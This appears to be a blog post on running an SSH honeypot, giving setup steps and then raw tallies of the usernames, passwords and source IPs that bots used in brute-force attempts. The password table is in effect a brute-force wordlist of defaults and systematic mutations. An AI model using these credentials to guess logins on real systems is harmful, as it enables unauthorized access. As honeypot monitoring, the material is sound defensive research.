Some time ago I finally found one pretty simple setup for the ssh honeypot
What I was looking for:
- log command
- emulate OS (or some simple commands)
I have already monitored top logins/passwords when bots are trying to brute force
And also for top countries from which bots are connecting
So now is the most interesting part: what they want?
Setup
git clone https://github.com/TrueBad0ur/ssh-honeypot.git
In my default docker-compose config the service will be running on the host’s port 22
In the case you have ssh running on it - change it in the config
To monitor data in the database I prefer using litecli
As we have volumes we can just do the following:
litecli app/db/honeypot.db
select * from `Command`
select * from `Login`
docker compose up
Data
Usernames
1 1234
1 a
1 access
1 activemq
1 activesolutions
1 ad
1 admin
1 administrator
1 alina
1 branchadmin
1 bti
1 businessadmin
1 cacti1
1 dbadmin
1 dbuser
1 default
1 deployer
1 develop
1 dv
1 ebaserdb
1 forge
1 ftpadmin
1 ftptest
1 javed
1 jira
1 khb
1 linlin
1 nimbus
1 nsrecover
1 ntc
1 ntw
1 orbtech
1 osmc
1 plexserver
1 rabbitmq
1 radio
1 RPM
1 sdc
1 sdjiiptv
1 se
1 secret
1 server
1 sftptest
1 \sFTPUser
1 sgeadmin
1 shadow
1 svnuser
1 syscheck
1 usr
1 vm
1 webadmin
1 x
2 cims.user
2 erp
2 ftp_user
2 gpuadmin
2 mongo
2 nproc
2 observer
2 orgadmin
2 remotessh
2 sdn
2 sFTPUser
2 site
2 strapi
2 sybase
2 tools
2 vyatta
2 web
3 devops
3 flask
3 sdadmin
3 vyos
4 amanda
4 anna
4 awsgui
4 azureuser
4 blockchain
4 boris
4 bot
4 chain
4 deepspeed
4 esadmin
4 esroot
4 gbase
4 goeth
4 hive
4 Ilzira
4 lsb
4 minecraft
4 nexus
4 nft
4 salavat
4 sftpuser
4 vladimir
4 vnc
5 ansible
5 flink
5 jenkins
5 smtp
5 ts
5 weblogic
6 appuser
6 bigdata
6 data
6 gitlab-runner
6 kubernetes
6 plex
7 jumpserver
7 ubnt
8 amandabackup
8 ec2-user
8 elk
8 ethnode
8 fil
8 gitlab-psql
8 gmod
8 gpadmin
8 jupyter
8 latitude
8 pal
8 yarn
8 zookeeper
9 elasticsearch
9 nvidia
10 elsearch
10 mongodb
10 worker
11 rancher
11 user1
12 airflow
12 ark
12 arkserver
12 bin
12 developer
12 satisfactory
12 solr
12 sys
12 zabbix
13 odoo
14 wang
15 dev
15 docker
15 lighthouse
15 sonar
15 tom
15 uftp
16 deploy
16 jack
16 mapr
16 oscar
16 sysadmin
16 tomcat
16 uucp
17 demo
17 elastic
17 mireactf
17 nginx
17 tckwe
17 wje
17 xntckwe
18 apache
18 ranger
19 guest
20 dolphin
20 ds
20 gitlab
20 node
20 omsagent
20 opc
21 centos
21 ftpuser
21 sftp
22 git
22 testuser
23 app
23 ftp
23 postgres
24 esuser
24 sol
24 solana
26 es
29 www
29 www-data
30 mysql
30 user
32 palworld
32 vagrant
33 dolphinscheduler
35 test
36 pi
38 ubuntu
39 hadoop
48 support
60 steam
65 oracle
475 admin
1561 root
Passwords
1 000000
1 11223311
1 123!
1 1234567890
1 1234567a
1 123456.cn
1 123.com
1 123@qq.com
1 123!@#qwe
1 163.com
1 1988
1 1q2w3e4r5t6y
1 1qaz!QAZ
1 33
1 4e2q1w3r
1 %4+q7d[VJT2^dcgg
1 4r3e2w1q
1 51nGleD
1 5913458bin
1 676767
1 #7300cal
1 9S3ORM7FkvKwMZRa1HZI
1 a
1 a1234
1 Aa111111
1 Aa@123456
1 abc1234
1 Abc12345
1 abc123456
1 Abc@123456
1 ABCabc123
1 abcd1234
1 activemq
1 activesolutions
1 admin
1 Admin1
1 admin9
1 Admin@9000
1 adminisp
1 administrator
1 adminpldt
1 alina
1 anheng
1 Asd!
1 Asd123$%^
1 beijing
1 bosco
1 branchadmin
1 bti
1 businessadmin
1 cacti1
1 CactiEZ
1 cdq238888
1 changeme
1 cims.user
1 Cisco123
1 Cloud@123
1 corpdomain
1 dbuser
1 deploy@123
1 deployer
1 dev1234
1 develop
1 digital2024
1 digitalocean
1 DigitalOcean
1 digitalocean123
1 DigitalOcean123
1 dv
1 ebaserdb
1 edongidc123456789
1 eve
1 eyidc
1 flask123
1 flink
1 forge
1 ftpadmin
1 ftptest
1 ftp_user
1 goodbye
1 gpadmin123
1 gpu-instance
1 guest666
1 huangfang@&!#((@@%
1 Huawei12#$
1 ibm123456
1 ilovegaoyan2009
1 instance
1 javed
1 jetson
1 jira
1 khb
1 la2008
1 linkwww
1 linlin
1 ls
1 Lt123456
1 mireactf@
1 Mireactf@
1 mireactf!1
1 mireactf@1
1 mireactf1@
1 Mireactf!1
1 Mireactf@1
1 Mireactf1@
1 mireactf!123
1 mireactf@123
1 mireactf123@
1 Mireactf!123
1 Mireactf@123
1 Mireactf123@
1 mireactf!12345
1 mireactf@12345
1 mireactf12345
1 mireactf12345!
1 mireactf12345@
1 Mireactf!12345
1 Mireactf@12345
1 Mireactf12345
1 Mireactf12345!
1 Mireactf12345@
1 mireactf!123456
1 mireactf@123456
1 mireactf123456
1 mireactf123456!
1 mireactf123456@
1 Mireactf!123456
1 Mireactf@123456
1 Mireactf123456
1 Mireactf123456!
1 Mireactf123456@
1 mireactf!123456789
1 mireactf@123456789
1 mireactf123456789
1 mireactf123456789!
1 mireactf123456789@
1 Mireactf!123456789
1 Mireactf@123456789
1 Mireactf123456789
1 Mireactf123456789!
1 Mireactf123456789@
1 mireactf!2020
1 mireactf@2020
1 mireactf2020
1 mireactf2020!
1 mireactf2020@
1 Mireactf!2020
1 Mireactf@2020
1 Mireactf2020
1 Mireactf2020!
1 Mireactf2020@
1 mireactf!2021
1 mireactf@2021
1 mireactf2021
1 mireactf2021!
1 mireactf2021@
1 Mireactf!2021
1 Mireactf@2021
1 Mireactf2021
1 Mireactf2021!
1 Mireactf2021@
1 mireactf!2022
1 mireactf@2022
1 mireactf2022
1 mireactf2022!
1 mireactf2022@
1 Mireactf!2022
1 Mireactf@2022
1 Mireactf2022
1 Mireactf2022!
1 Mireactf2022@
1 mireactf!2023
1 mireactf@2023
1 mireactf2023
1 mireactf2023!
1 mireactf2023@
1 Mireactf!2023
1 Mireactf@2023
1 Mireactf2023
1 Mireactf2023!
1 Mireactf2023@
1 MoeClub.org
1 mudar123
1 mysql1234
1 newworld
1 nimbus
1 nsroot
1 ntc
1 ntw
1 observer
1 observer123
1 Oracle1
1 Oracle123
1 oracle1234
1 Oracle1234
1 orbtech
1 orgadmin
1 osmc
1 p0o9i8u7
1 P@55w0rd
1 Passw0rd!
1 PASSW0RD
1 penis
1 pi
1 plexserver
1 puhua
1 q1w2e3r4
1 qawsedrf
1 qaz123!@#
1 !QAZ2wsx3edc
1 qaz.369
1 qpwoei
1 qq.124
1 !Q@W3e4r
1 qwe123
1 !@#qwe123
1 QWEasd123
1 rabbitmq
1 radio
1 remotessh
1 rocks
1 root@123456
1 root1234567@123
1 rootpass
1 RPM
1 ruijie
1 sa%%%%%%
1 sa&&&&&&
1 SDJI-m60001!@#
1 sdn
1 secret488121!
1 sftptest
1 sFTPUser
1 sgeadmin
1 shadow
1 shanghai
1 site
1 smtp
1 smtp123
1 sybase
1 syscheck
1 tckwe@
1 Tckwe@
1 tckwe!1
1 tckwe@1
1 tckwe1@
1 Tckwe!1
1 Tckwe@1
1 Tckwe1@
1 tckwe!123
1 tckwe@123
1 tckwe123@
1 Tckwe!123
1 Tckwe@123
1 Tckwe123@
1 tckwe!12345
1 tckwe@12345
1 tckwe12345
1 tckwe12345!
1 tckwe12345@
1 Tckwe!12345
1 Tckwe@12345
1 Tckwe12345
1 Tckwe12345!
1 Tckwe12345@
1 tckwe!123456
1 tckwe@123456
1 tckwe123456
1 tckwe123456!
1 tckwe123456@
1 Tckwe!123456
1 Tckwe@123456
1 Tckwe123456
1 Tckwe123456!
1 Tckwe123456@
1 tckwe!123456789
1 tckwe@123456789
1 tckwe123456789
1 tckwe123456789!
1 tckwe123456789@
1 Tckwe!123456789
1 Tckwe@123456789
1 Tckwe123456789
1 Tckwe123456789!
1 Tckwe123456789@
1 tckwe!2020
1 tckwe@2020
1 tckwe2020
1 tckwe2020!
1 tckwe2020@
1 Tckwe!2020
1 Tckwe@2020
1 Tckwe2020
1 Tckwe2020!
1 Tckwe2020@
1 tckwe!2021
1 tckwe@2021
1 tckwe2021
1 tckwe2021!
1 tckwe2021@
1 Tckwe!2021
1 Tckwe@2021
1 Tckwe2021
1 Tckwe2021!
1 Tckwe2021@
1 tckwe!2022
1 tckwe@2022
1 tckwe2022
1 tckwe2022!
1 tckwe2022@
1 Tckwe!2022
1 Tckwe@2022
1 Tckwe2022
1 Tckwe2022!
1 Tckwe2022@
1 tckwe!2023
1 tckwe@2023
1 tckwe2023
1 tckwe2023!
1 tckwe2023@
1 Tckwe!2023
1 Tckwe@2023
1 Tckwe2023
1 Tckwe2023!
1 Tckwe2023@
1 telnet
1 Test1
1 test@123
1 Test123
1 Test1234
1 tianleidc
1 tools
1 tools123
1 Ubuntu123
1 ubuntu1234
1 Ubuntu1234
1 user123
1 vm
1 w8je
1 w8je!
1 w8je@
1 W8Je
1 W8Je!
1 W8Je@
1 w8je!1
1 w8je@1
1 w8je1
1 w8je1!
1 w8je1@
1 W8Je!1
1 W8Je@1
1 W8Je1
1 W8Je1!
1 W8Je1@
1 w8je!123
1 w8je@123
1 w8je123
1 w8je123!
1 w8je123@
1 W8Je!123
1 W8Je@123
1 W8Je123
1 W8Je123!
1 W8Je123@
1 w8je!12345
1 w8je@12345
1 w8je12345
1 w8je12345!
1 w8je12345@
1 W8Je!12345
1 W8Je@12345
1 W8Je12345
1 W8Je12345!
1 W8Je12345@
1 w8je!123456
1 w8je@123456
1 w8je123456
1 w8je123456!
1 w8je123456@
1 W8Je!123456
1 W8Je@123456
1 W8Je123456
1 W8Je123456!
1 W8Je123456@
1 w8je!123456789
1 w8je@123456789
1 w8je123456789
1 w8je123456789!
1 w8je123456789@
1 W8Je!123456789
1 W8Je@123456789
1 W8Je123456789
1 W8Je123456789!
1 W8Je123456789@
1 w8je!2020
1 w8je@2020
1 w8je2020
1 w8je2020!
1 w8je2020@
1 W8Je!2020
1 W8Je@2020
1 W8Je2020
1 W8Je2020!
1 W8Je2020@
1 w8je!2021
1 w8je@2021
1 w8je2021
1 w8je2021!
1 w8je2021@
1 W8Je!2021
1 W8Je@2021
1 W8Je2021
1 W8Je2021!
1 W8Je2021@
1 w8je!2022
1 w8je@2022
1 w8je2022
1 w8je2022!
1 w8je2022@
1 W8Je!2022
1 W8Je@2022
1 W8Je2022
1 W8Je2022!
1 W8Je2022@
1 w8je!2023
1 w8je@2023
1 w8je2023
1 w8je2023!
1 w8je2023@
1 W8Je!2023
1 W8Je@2023
1 W8Je2023
1 W8Je2023!
1 W8Je2023@
1 web
1 webadmin
1 westadmin
1 windows123456
1 winter
1 wje@
1 Wje@
1 wje!1
1 wje@1
1 wje1@
1 Wje!1
1 Wje@1
1 Wje1@
1 wje!123
1 wje@123
1 wje123@
1 Wje!123
1 Wje@123
1 Wje123@
1 wje!12345
1 wje@12345
1 wje12345
1 wje12345!
1 wje12345@
1 Wje!12345
1 Wje@12345
1 Wje12345
1 Wje12345!
1 Wje12345@
1 wje!123456
1 wje@123456
1 wje123456
1 wje123456!
1 wje123456@
1 Wje!123456
1 Wje@123456
1 Wje123456
1 Wje123456!
1 Wje123456@
1 wje!123456789
1 wje@123456789
1 wje123456789
1 wje123456789!
1 wje123456789@
1 Wje!123456789
1 Wje@123456789
1 Wje123456789
1 Wje123456789!
1 Wje123456789@
1 wje!2020
1 wje@2020
1 wje2020
1 wje2020!
1 wje2020@
1 Wje!2020
1 Wje@2020
1 Wje2020
1 Wje2020!
1 Wje2020@
1 wje!2021
1 wje@2021
1 wje2021
1 wje2021!
1 wje2021@
1 Wje!2021
1 Wje@2021
1 Wje2021
1 Wje2021!
1 Wje2021@
1 wje!2022
1 wje@2022
1 wje2022
1 wje2022!
1 wje2022@
1 Wje!2022
1 Wje@2022
1 Wje2022
1 Wje2022!
1 Wje2022@
1 wje!2023
1 wje@2023
1 wje2023
1 wje2023!
1 wje2023@
1 Wje!2023
1 Wje@2023
1 Wje2023
1 Wje2023!
1 Wje2023@
1 woaiwo
1 wojiaolijn77911
1 www.mir2.com
1 www.usr.cn
1 x
1 xn--tckwe
1 xn--tckwe!
1 xn--tckwe@
1 xntckwe@
1 Xntckwe@
1 Xn--Tckwe
1 Xn--Tckwe!
1 Xn--Tckwe@
1 xn--tckwe!1
1 xn--tckwe@1
1 xn--tckwe1
1 xn--tckwe1!
1 xn--tckwe1@
1 xntckwe!1
1 xntckwe@1
1 xntckwe1@
1 Xntckwe!1
1 Xntckwe@1
1 Xntckwe1@
1 Xn--Tckwe!1
1 Xn--Tckwe@1
1 Xn--Tckwe1
1 Xn--Tckwe1!
1 Xn--Tckwe1@
1 xn--tckwe!123
1 xn--tckwe@123
1 xn--tckwe123
1 xn--tckwe123!
1 xn--tckwe123@
1 xntckwe!123
1 xntckwe@123
1 xntckwe123@
1 Xntckwe!123
1 Xntckwe@123
1 Xntckwe123@
1 Xn--Tckwe!123
1 Xn--Tckwe@123
1 Xn--Tckwe123
1 Xn--Tckwe123!
1 Xn--Tckwe123@
1 xn--tckwe!12345
1 xn--tckwe@12345
1 xn--tckwe12345
1 xn--tckwe12345!
1 xn--tckwe12345@
1 xntckwe!12345
1 xntckwe@12345
1 xntckwe12345
1 xntckwe12345!
1 xntckwe12345@
1 Xntckwe!12345
1 Xntckwe@12345
1 Xntckwe12345
1 Xntckwe12345!
1 Xntckwe12345@
1 Xn--Tckwe!12345
1 Xn--Tckwe@12345
1 Xn--Tckwe12345
1 Xn--Tckwe12345!
1 Xn--Tckwe12345@
1 xn--tckwe!123456
1 xn--tckwe@123456
1 xn--tckwe123456
1 xn--tckwe123456!
1 xn--tckwe123456@
1 xntckwe!123456
1 xntckwe@123456
1 xntckwe123456
1 xntckwe123456!
1 xntckwe123456@
1 Xntckwe!123456
1 Xntckwe@123456
1 Xntckwe123456
1 Xntckwe123456!
1 Xntckwe123456@
1 Xn--Tckwe!123456
1 Xn--Tckwe@123456
1 Xn--Tckwe123456
1 Xn--Tckwe123456!
1 Xn--Tckwe123456@
1 xn--tckwe!123456789
1 xn--tckwe@123456789
1 xn--tckwe123456789
1 xn--tckwe123456789!
1 xn--tckwe123456789@
1 xntckwe!123456789
1 xntckwe@123456789
1 xntckwe123456789
1 xntckwe123456789!
1 xntckwe123456789@
1 Xntckwe!123456789
1 Xntckwe@123456789
1 Xntckwe123456789
1 Xntckwe123456789!
1 Xntckwe123456789@
1 Xn--Tckwe!123456789
1 Xn--Tckwe@123456789
1 Xn--Tckwe123456789
1 Xn--Tckwe123456789!
1 Xn--Tckwe123456789@
1 xn--tckwe!2020
1 xn--tckwe@2020
1 xn--tckwe2020
1 xn--tckwe2020!
1 xn--tckwe2020@
1 xntckwe!2020
1 xntckwe@2020
1 xntckwe2020
1 xntckwe2020!
1 xntckwe2020@
1 Xntckwe!2020
1 Xntckwe@2020
1 Xntckwe2020
1 Xntckwe2020!
1 Xntckwe2020@
1 Xn--Tckwe!2020
1 Xn--Tckwe@2020
1 Xn--Tckwe2020
1 Xn--Tckwe2020!
1 Xn--Tckwe2020@
1 xn--tckwe!2021
1 xn--tckwe@2021
1 xn--tckwe2021
1 xn--tckwe2021!
1 xn--tckwe2021@
1 xntckwe!2021
1 xntckwe@2021
1 xntckwe2021
1 xntckwe2021!
1 xntckwe2021@
1 Xntckwe!2021
1 Xntckwe@2021
1 Xntckwe2021
1 Xntckwe2021!
1 Xntckwe2021@
1 Xn--Tckwe!2021
1 Xn--Tckwe@2021
1 Xn--Tckwe2021
1 Xn--Tckwe2021!
1 Xn--Tckwe2021@
1 xn--tckwe!2022
1 xn--tckwe@2022
1 xn--tckwe2022
1 xn--tckwe2022!
1 xn--tckwe2022@
1 xntckwe!2022
1 xntckwe@2022
1 xntckwe2022
1 xntckwe2022!
1 xntckwe2022@
1 Xntckwe!2022
1 Xntckwe@2022
1 Xntckwe2022
1 Xntckwe2022!
1 Xntckwe2022@
1 Xn--Tckwe!2022
1 Xn--Tckwe@2022
1 Xn--Tckwe2022
1 Xn--Tckwe2022!
1 Xn--Tckwe2022@
1 xn--tckwe!2023
1 xn--tckwe@2023
1 xn--tckwe2023
1 xn--tckwe2023!
1 xn--tckwe2023@
1 xntckwe!2023
1 xntckwe@2023
1 xntckwe2023
1 xntckwe2023!
1 xntckwe2023@
1 Xntckwe!2023
1 Xntckwe@2023
1 Xntckwe2023
1 Xntckwe2023!
1 Xntckwe2023@
1 Xn--Tckwe!2023
1 Xn--Tckwe@2023
1 Xn--Tckwe2023
1 Xn--Tckwe2023!
1 Xn--Tckwe2023@
1 xn--w8je
1 xn--w8je!
1 xn--w8je@
1 xnw8je
1 xnw8je!
1 xnw8je@
1 Xnw8Je
1 Xnw8Je!
1 Xnw8Je@
1 Xn--W8Je
1 Xn--W8Je!
1 Xn--W8Je@
1 xn--w8je!1
1 xn--w8je@1
1 xn--w8je1
1 xn--w8je1!
1 xn--w8je1@
1 xnw8je!1
1 xnw8je@1
1 xnw8je1
1 xnw8je1!
1 xnw8je1@
1 Xnw8Je!1
1 Xnw8Je@1
1 Xnw8Je1
1 Xnw8Je1!
1 Xnw8Je1@
1 Xn--W8Je!1
1 Xn--W8Je@1
1 Xn--W8Je1
1 Xn--W8Je1!
1 Xn--W8Je1@
1 xn--w8je!123
1 xn--w8je@123
1 xn--w8je123
1 xn--w8je123!
1 xn--w8je123@
1 xnw8je!123
1 xnw8je@123
1 xnw8je123
1 xnw8je123!
1 xnw8je123@
1 Xnw8Je!123
1 Xnw8Je@123
1 Xnw8Je123
1 Xnw8Je123!
1 Xnw8Je123@
1 Xn--W8Je!123
1 Xn--W8Je@123
1 Xn--W8Je123
1 Xn--W8Je123!
1 Xn--W8Je123@
1 xn--w8je!12345
1 xn--w8je@12345
1 xn--w8je12345
1 xn--w8je12345!
1 xn--w8je12345@
1 xnw8je!12345
1 xnw8je@12345
1 xnw8je12345
1 xnw8je12345!
1 xnw8je12345@
1 Xnw8Je!12345
1 Xnw8Je@12345
1 Xnw8Je12345
1 Xnw8Je12345!
1 Xnw8Je12345@
1 Xn--W8Je!12345
1 Xn--W8Je@12345
1 Xn--W8Je12345
1 Xn--W8Je12345!
1 Xn--W8Je12345@
1 xn--w8je!123456
1 xn--w8je@123456
1 xn--w8je123456
1 xn--w8je123456!
1 xn--w8je123456@
1 xnw8je!123456
1 xnw8je@123456
1 xnw8je123456
1 xnw8je123456!
1 xnw8je123456@
1 Xnw8Je!123456
1 Xnw8Je@123456
1 Xnw8Je123456
1 Xnw8Je123456!
1 Xnw8Je123456@
1 Xn--W8Je!123456
1 Xn--W8Je@123456
1 Xn--W8Je123456
1 Xn--W8Je123456!
1 Xn--W8Je123456@
1 xn--w8je!123456789
1 xn--w8je@123456789
1 xn--w8je123456789
1 xn--w8je123456789!
1 xn--w8je123456789@
1 xnw8je!123456789
1 xnw8je@123456789
1 xnw8je123456789
1 xnw8je123456789!
1 xnw8je123456789@
1 Xnw8Je!123456789
1 Xnw8Je@123456789
1 Xnw8Je123456789
1 Xnw8Je123456789!
1 Xnw8Je123456789@
1 Xn--W8Je!123456789
1 Xn--W8Je@123456789
1 Xn--W8Je123456789
1 Xn--W8Je123456789!
1 Xn--W8Je123456789@
1 xn--w8je!2020
1 xn--w8je@2020
1 xn--w8je2020
1 xn--w8je2020!
1 xn--w8je2020@
1 xnw8je!2020
1 xnw8je@2020
1 xnw8je2020
1 xnw8je2020!
1 xnw8je2020@
1 Xnw8Je!2020
1 Xnw8Je@2020
1 Xnw8Je2020
1 Xnw8Je2020!
1 Xnw8Je2020@
1 Xn--W8Je!2020
1 Xn--W8Je@2020
1 Xn--W8Je2020
1 Xn--W8Je2020!
1 Xn--W8Je2020@
1 xn--w8je!2021
1 xn--w8je@2021
1 xn--w8je2021
1 xn--w8je2021!
1 xn--w8je2021@
1 xnw8je!2021
1 xnw8je@2021
1 xnw8je2021
1 xnw8je2021!
1 xnw8je2021@
1 Xnw8Je!2021
1 Xnw8Je@2021
1 Xnw8Je2021
1 Xnw8Je2021!
1 Xnw8Je2021@
1 Xn--W8Je!2021
1 Xn--W8Je@2021
1 Xn--W8Je2021
1 Xn--W8Je2021!
1 Xn--W8Je2021@
1 xn--w8je!2022
1 xn--w8je@2022
1 xn--w8je2022
1 xn--w8je2022!
1 xn--w8je2022@
1 xnw8je!2022
1 xnw8je@2022
1 xnw8je2022
1 xnw8je2022!
1 xnw8je2022@
1 Xnw8Je!2022
1 Xnw8Je@2022
1 Xnw8Je2022
1 Xnw8Je2022!
1 Xnw8Je2022@
1 Xn--W8Je!2022
1 Xn--W8Je@2022
1 Xn--W8Je2022
1 Xn--W8Je2022!
1 Xn--W8Je2022@
1 xn--w8je!2023
1 xn--w8je@2023
1 xn--w8je2023
1 xn--w8je2023!
1 xn--w8je2023@
1 xnw8je!2023
1 xnw8je@2023
1 xnw8je2023
1 xnw8je2023!
1 xnw8je2023@
1 Xnw8Je!2023
1 Xnw8Je@2023
1 Xnw8Je2023
1 Xnw8Je2023!
1 Xnw8Je2023@
1 Xn--W8Je!2023
1 Xn--W8Je@2023
1 Xn--W8Je2023
1 Xn--W8Je2023!
1 Xn--W8Je2023@
1 xn--wje
1 xn--wje!
1 xn--wje@
1 Xn--Wje
1 Xn--Wje!
1 Xn--Wje@
1 xn--wje!1
1 xn--wje@1
1 xn--wje1
1 xn--wje1!
1 xn--wje1@
1 Xn--Wje!1
1 Xn--Wje@1
1 Xn--Wje1
1 Xn--Wje1!
1 Xn--Wje1@
1 xn--wje!123
1 xn--wje@123
1 xn--wje123
1 xn--wje123!
1 xn--wje123@
1 Xn--Wje!123
1 Xn--Wje@123
1 Xn--Wje123
1 Xn--Wje123!
1 Xn--Wje123@
1 xn--wje!12345
1 xn--wje@12345
1 xn--wje12345
1 xn--wje12345!
1 xn--wje12345@
1 Xn--Wje!12345
1 Xn--Wje@12345
1 Xn--Wje12345
1 Xn--Wje12345!
1 Xn--Wje12345@
1 xn--wje!123456
1 xn--wje@123456
1 xn--wje123456
1 xn--wje123456!
1 xn--wje123456@
1 Xn--Wje!123456
1 Xn--Wje@123456
1 Xn--Wje123456
1 Xn--Wje123456!
1 Xn--Wje123456@
1 xn--wje!123456789
1 xn--wje@123456789
1 xn--wje123456789
1 xn--wje123456789!
1 xn--wje123456789@
1 Xn--Wje!123456789
1 Xn--Wje@123456789
1 Xn--Wje123456789
1 Xn--Wje123456789!
1 Xn--Wje123456789@
1 xn--wje!2020
1 xn--wje@2020
1 xn--wje2020
1 xn--wje2020!
1 xn--wje2020@
1 Xn--Wje!2020
1 Xn--Wje@2020
1 Xn--Wje2020
1 Xn--Wje2020!
1 Xn--Wje2020@
1 xn--wje!2021
1 xn--wje@2021
1 xn--wje2021
1 xn--wje2021!
1 xn--wje2021@
1 Xn--Wje!2021
1 Xn--Wje@2021
1 Xn--Wje2021
1 Xn--Wje2021!
1 Xn--Wje2021@
1 xn--wje!2022
1 xn--wje@2022
1 xn--wje2022
1 xn--wje2022!
1 xn--wje2022@
1 Xn--Wje!2022
1 Xn--Wje@2022
1 Xn--Wje2022
1 Xn--Wje2022!
1 Xn--Wje2022@
1 xn--wje!2023
1 xn--wje@2023
1 xn--wje2023
1 xn--wje2023!
1 xn--wje2023@
1 Xn--Wje!2023
1 Xn--Wje@2023
1 Xn--Wje2023
1 Xn--Wje2023!
1 Xn--Wje2023@
1 ZAQ!XSW@CDE#VFR$
1 zitianidc2008
1 zj123654
1 zj3303
1 zkwjyn520
2 1qaz@wsx
2 AA123456
2 Ab123456
2 broadguam1
2 daniel12
2 erp
2 ---fuck_you----
2 gpuadmin
2 mireactf
2 mireactf!
2 Mireactf
2 Mireactf!
2 mireactf1
2 mireactf1!
2 Mireactf1
2 Mireactf1!
2 mireactf123
2 mireactf123!
2 Mireactf123
2 Mireactf123!
2 nproc
2 Pa$$w0rd
2 passw0rd
2 P@ssw0rd
2 p@ssword
2 !qaz@WSX
2 !Qaz@Wsx
2 Qq123456
2 qwert12345
2 Root1
2 Root123
2 Root1234
2 soda
2 strapi
2 tckwe
2 tckwe!
2 Tckwe
2 Tckwe!
2 tckwe1
2 tckwe1!
2 Tckwe1
2 Tckwe1!
2 tckwe123
2 tckwe123!
2 Tckwe123
2 Tckwe123!
2 test1234
2 vyatta
2 wje
2 wje!
2 Wje
2 Wje!
2 wje1
2 wje1!
2 Wje1
2 Wje1!
2 wje123
2 wje123!
2 Wje123
2 Wje123!
2 xntckwe
2 xntckwe!
2 Xntckwe
2 Xntckwe!
2 xntckwe1
2 xntckwe1!
2 Xntckwe1
2 Xntckwe1!
2 xntckwe123
2 xntckwe123!
2 Xntckwe123
2 Xntckwe123!
3 aA123456
3 Aa123456
3 Admin123
3 admin1234
3 Admin1234
3 qazWSX
3 root!123
3 root@123
3 root1234
3 vyos
4 11111111
4 123123
4 123456
4 !@#123qwe
4 125125
4 1q2w3e4r
4 1qaz2wsx3edc
4 87654321
4 987654321
4 admin123456
4 airflow
4 airflow123
4 amanda
4 amandabackup
4 ansible
4 ark
4 ark123
4 arkserver
4 arkserver123
4 awsgui
4 azerty
4 azureuser
4 bin
4 bin123
4 blockchain
4 bot
4 centos123
4 centos123456
4 chain
4 deepspeed
4 demo123
4 demo123456
4 dolphin123
4 dolphinscheduler@123
4 dolphinscheduler123
4 dolphinscheduler123!
4 ds
4 ds123
4 ds123456
4 ec2-user
4 elk
4 elk123
4 es123
4 esadmin
4 esroot
4 ethnode
4 ethnode123
4 fil
4 flink123
4 gbase
4 git
4 gitlab-psql
4 gmod
4 gmod123
4 goeth
4 hadoop!
4 hadoop123
4 hadoop123.
4 hive
4 Huawei123
4 Huawei123!
4 Ilzira
4 jack
4 jack123
4 jupyter123
4 latitude
4 lighthouse
4 lsb
4 mapr
4 mapr123
4 minecraft
4 mongodb
4 nexus
4 nft
4 node
4 node123
4 node123456
4 nvidia
4 odoo123
4 oms
4 omsagent
4 omsagent123
4 opc
4 opc123
4 opc123456
4 osmandoa123
4 P$ssw0rd
4 P$ssword
4 Palworld
4 palworld123
4 palworld123!
4 Palworld123
4 passwd
4 Password!
4 Password12
4 Password@123
4 Password123
4 Password1234
4 postgres123
4 P@ssw0rd1
4 P@ssw0rd12
4 P@ssw0rd@123
4 q
4 qazwsx
4 QAZwsx
4 qwer1234
4 qwerty
4 qwerty@123
4 root!@#
4 root11root
4 root123!
4 root123@
4 Root@123
4 Root123456
4 Rootroot
4 salavat
4 satisfactory123
4 sftp123
4 sftp123456
4 sftpuser
4 sol@123
4 sol123
4 solana@123
4 solana123
4 solr
4 solr123
4 solr123!
4 steam.
4 steam@123
4 steam123!
4 sys
4 sys123
4 sysadmin123
4 tencent
4 testuser123
4 tom
4 toor
4 ubuntu@123
4 ubuntu123!
4 ubuntu123.
4 uucp
4 uucp123
4 vagrant123
4 validator
4 vnc
4 wang
4 www@123
4 www123
4 www-data!
4 www-data.
4 www-data123
4 yarn
4 yarn123
4 zookeeper
5 0
5 1234567
5 1234qwer
5 123qwe
5 1Q2w3e4r
5 1qaz@WSX3edc
5 admin@123
5 app123
5 demo
5 deploy123
5 docker
5 elastic
5 elastic123
5 elasticsearch
5 elsearch
5 es
5 es123456
5 ------fuck------
5 gitlab
5 hadoop
5 Huawei@123
5 jenkins
5 jupyter
5 nginx
5 nginx123
5 nvidia123
5 odoo
5 oscar123
5 Password1
5 P@ssw0rd123
5 !QAZ@wsx
5 qwe123!@#
5 rancher123
5 ranger
5 ranger123
5 redhat
5 rootroot
5 server
5 sftp
5 sonar
5 sonar123
5 steam123
5 tom123
5 tomcat
5 tomcat123
5 ts
5 ubuntu123
5 uftp
5 weblogic
5 worker
5 worker123
5 www-data
5 zabbix
6 123321
6 1Q2W3E4R
6 321
6 apache
6 app
6 app123456
6 appuser
6 bigdata
6 deploy
6 dev123456
6 developer
6 devops
6 docker123
6 esuser123
6 ftp
6 ftpuser
6 ftpuser123
6 gitlab123
6 gitlab-runner
6 guest
6 guest123
6 kubernetes
6 lighthouse123
6 mysql123
6 plex
6 Qwerty
6 QWERTY123
6 rancher
6 steam
6 test123
6 ubnt
6 uftp123
6 user1
6 wang123
7 esuser
7 git123
7 gpadmin
7 jumpserver
7 P@ssword
7 vagrant
8 apache123
8 dolphin
8 dolphinscheduler
8 ftp123
8 mysql
8 oracle123
8 oscar
8 pal
8 Password
8 p@ssw0rd
8 satisfactory
8 sol
8 solana
8 sysadmin
8 testuser
9 12
9 123456789
9 centos
9 dev
9 postgres
9 root123
9 www
10 1qaz2wsx
10 data
10 Passw0rd
10 qwerty123
10 user
11 111111
11 admin123
11 password
11 !Q2w3e4r
12 oracle
12 palworld
13 !QAZ2wsx
13 !QAZ@WSX
13 test
15 raspberryraspberry993311
17 12345
17 root
18 ubuntu
19 raspberry
24 1234
27 1qaz@WSX
28 12345678
34 abc123
46 1
48 support
68 kjashd123sadhj123dhs1SS
130 123
338 123456
402 admin
IPs
1 101.126.31.193
1 10.66.66.2
1 1.15.239.155
1 117.219.14.193
1 118.178.236.38
1 120.211.146.25
1 14.23.153.178
1 156.242.48.161
1 165.154.236.21
1 185.224.128.160
1 188.166.219.87
1 200.106.249.148
1 222.77.96.52
1 27.197.77.2
1 34.125.0.92
1 4.17.226.146
1 43.133.225.229
1 43.248.134.185
1 43.248.139.88
1 45.120.227.190
1 58.215.203.139
1 8.218.93.35
1 96.127.160.234
1 97.74.91.249
2 121.1.70.115
2 128.199.173.222
2 173.220.118.130
2 185.224.128.55
2 185.231.182.104
2 185.89.39.186
2 193.41.142.9
2 211.101.237.50
2 212.70.149.150
2 46.121.219.233
2 49.235.140.186
2 62.42.157.193
2 70.44.38.158
